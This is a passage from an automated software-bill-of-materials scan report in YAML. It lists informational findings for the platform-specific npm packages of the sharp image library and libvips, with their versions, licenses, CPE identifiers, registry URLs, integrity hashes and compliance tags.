https://registry.npmjs.org/@img/sharp-libvips-linux-x64/-/sharp-libvips-linux-x64-1.2.4.tgz integrity: sha512-tJxiiLsmHc9Ax1bz3oaOYBURTXGIRDODBqhveVHonrHJ9/+k89qbLl0bcJns+e4t4rvaNBxaEZsFtSfAdquPrw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7de94e70bc6a1409 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4' title: '@img/sharp-libvips-linuxmusl-arm64 1.2.4' description: 'Package discovered: @img/sharp-libvips-linuxmusl-arm64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 67f7722888e07f97 name: '@img/sharp-libvips-linuxmusl-arm64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_arm64:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_arm64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linuxmusl-arm64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-arm64/-/sharp-libvips-linuxmusl-arm64-1.2.4.tgz integrity: sha512-FVQHuwx1IIuNow9QAbYUzJ+En8KcVm9Lk5+uGUQJHaZmMECZmOlix9HnH7n1TRkXMS0pGxIJokIVB9SuqZGGXw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: c540ef9b43418974 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4' title: '@img/sharp-libvips-linuxmusl-x64 1.2.4' description: 'Package discovered: @img/sharp-libvips-linuxmusl-x64 1.2.4' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 61da63d4bf468c4d name: '@img/sharp-libvips-linuxmusl-x64' version: 1.2.4 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: LGPL-3.0-or-later spdxExpression: LGPL-3.0-or-later type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl-x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl_x64:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips-linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips_linuxmusl:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_libvips:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-libvips-linuxmusl-x64:1.2.4:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_libvips_linuxmusl_x64:1.2.4:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-libvips-linuxmusl-x64@1.2.4 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-libvips-linuxmusl-x64/-/sharp-libvips-linuxmusl-x64-1.2.4.tgz integrity: sha512-+LpyBk7L44ZIXwz/VYfglaX/okxezESc6UxDSoyo2Ks6Jxc4Y7sGjpgU9s4PMgqgjj1gZCylTieNamqA1MF7Dg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 9ac46491201655bd ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linux-arm 0.34.5' title: '@img/sharp-linux-arm 0.34.5' description: 'Package discovered: @img/sharp-linux-arm 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: dcf7df343a75d233 name: '@img/sharp-linux-arm' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux-arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_arm:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linux-arm@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linux-arm/-/sharp-linux-arm-0.34.5.tgz integrity: sha512-9dLqsvwtg1uuXBGZKsxem9595+ujv0sJ6Vi8wcTANSFpwV/GONat5eCkzQo/1O6zRIkh0m/8+5BjrRr7jDUSZw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: f3729e97d1846b60 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linux-arm64 0.34.5' title: '@img/sharp-linux-arm64 0.34.5' description: 'Package discovered: @img/sharp-linux-arm64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: fd64c295f8bc0b6a name: '@img/sharp-linux-arm64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux-arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_arm64:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linux-arm64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linux-arm64/-/sharp-linux-arm64-0.34.5.tgz integrity: sha512-bKQzaJRY/bkPOXyKx5EVup7qkaojECG6NLYswgktOZjaXecSAeCWiZwwiFf3/Y+O1HrauiE3FVsGxFg8c24rZg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7108a685f3138a28 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linux-ppc64 0.34.5' title: '@img/sharp-linux-ppc64 0.34.5' description: 'Package discovered: @img/sharp-linux-ppc64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 3b1510e0e0b839b3 name: '@img/sharp-linux-ppc64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux-ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_ppc64:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_ppc64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linux-ppc64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linux-ppc64/-/sharp-linux-ppc64-0.34.5.tgz integrity: sha512-7zznwNaqW6YtsfrGGDA6BRkISKAAE1Jo0QdpNYXNMHu2+0dTrPflTLNkpc8l7MUP5M16ZJcUvysVWWrMefZquA== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 7bce516733b8ed22 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linux-riscv64 0.34.5' title: '@img/sharp-linux-riscv64 0.34.5' description: 'Package discovered: @img/sharp-linux-riscv64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 523b83e120964834 name: '@img/sharp-linux-riscv64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux-riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_riscv64:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_riscv64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linux-riscv64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linux-riscv64/-/sharp-linux-riscv64-0.34.5.tgz integrity: sha512-51gJuLPTKa7piYPaVs8GmByo7/U7/7TZOq+cnXJIHZKavIRHAP77e3N2HEl3dgiqdD/w0yUfiJnII77PuDDFdw== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 95b5e1930a0a90db ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linux-s390x 0.34.5' title: '@img/sharp-linux-s390x 0.34.5' description: 'Package discovered: @img/sharp-linux-s390x 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: cdcec5be4d61926b name: '@img/sharp-linux-s390x' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux-s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_s390x:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_s390x:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linux-s390x@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linux-s390x/-/sharp-linux-s390x-0.34.5.tgz integrity: sha512-nQtCk0PdKfho3eC5MrbQoigJ2gd1CgddUMkabUj+rBevs8tZ2cULOx46E7oyX+04WGfABgIwmMC0VqieTiR4jg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: ba4a76a3169a3261 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linux-x64 0.34.5' title: '@img/sharp-linux-x64 0.34.5' description: 'Package discovered: @img/sharp-linux-x64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 8ea3a106d5c8d10b name: '@img/sharp-linux-x64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux-x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux_x64:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linux:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linux-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linux_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linux-x64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linux-x64/-/sharp-linux-x64-0.34.5.tgz integrity: sha512-MEzd8HPKxVxVenwAa+JRPwEC7QFjoPWuS5NZnBt6B3pu7EG2Ge0id1oLHZpPJdn3OQK+BQDiw9zStiHBTJQQQQ== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 357195decb462ec7 ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5' title: '@img/sharp-linuxmusl-arm64 0.34.5' description: 'Package discovered: @img/sharp-linuxmusl-arm64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: c5d74af075cbec8c name: '@img/sharp-linuxmusl-arm64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_arm64:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp-linuxmusl-arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp:\@img\/sharp_linuxmusl_arm64:0.34.5:*:*:*:*:*:*:* source: syft-generated purl: pkg:npm/%40img/sharp-linuxmusl-arm64@0.34.5 metadataType: javascript-npm-package-lock-entry metadata: resolved: https://registry.npmjs.org/@img/sharp-linuxmusl-arm64/-/sharp-linuxmusl-arm64-0.34.5.tgz integrity: sha512-fprJR6GtRsMt6Kyfq44IsChVZeGN97gTD331weR1ex1c1rypDEABN6Tm2xa1wE6lYb5DdEnk03NZPqA7Id21yg== dependencies: null compliance: cisControlsV8_1: *id010 nistCsf2_0: - *id011 - *id012 pciDss4_0: - *id013 - *id014 mitreAttack: - *id015 priority: priority: 3.333333333333333 epss: null epss_percentile: null is_kev: false kev_due_date: null components: severity_score: 1 epss_multiplier: 1.0 kev_multiplier: 1.0 reachability_multiplier: 1.0 - schemaVersion: 1.2.0 id: 5332b892777fe61c ruleId: SBOM.PACKAGE severity: INFO tool: name: syft version: unknown location: path: /package-lock.json startLine: 0 message: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5' title: '@img/sharp-linuxmusl-x64 0.34.5' description: 'Package discovered: @img/sharp-linuxmusl-x64 0.34.5' remediation: Track and scan dependencies. references: [] tags: - sbom - package raw: id: 26c07c454ffe91ee name: '@img/sharp-linuxmusl-x64' version: 0.34.5 type: npm foundBy: javascript-lock-cataloger locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary licenses: - value: Apache-2.0 spdxExpression: Apache-2.0 type: declared urls: [] locations: - path: /package-lock.json accessPath: /package-lock.json annotations: evidence: primary language: javascript cpes: - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp-linuxmusl-x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp-linuxmusl-x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - cpe: cpe:2.3:a:\@img\/sharp_linuxmusl_x64:\@img\/sharp_linuxmusl_x64:0.34.5:*:*:*:*:*:*:* source: syft-generated - 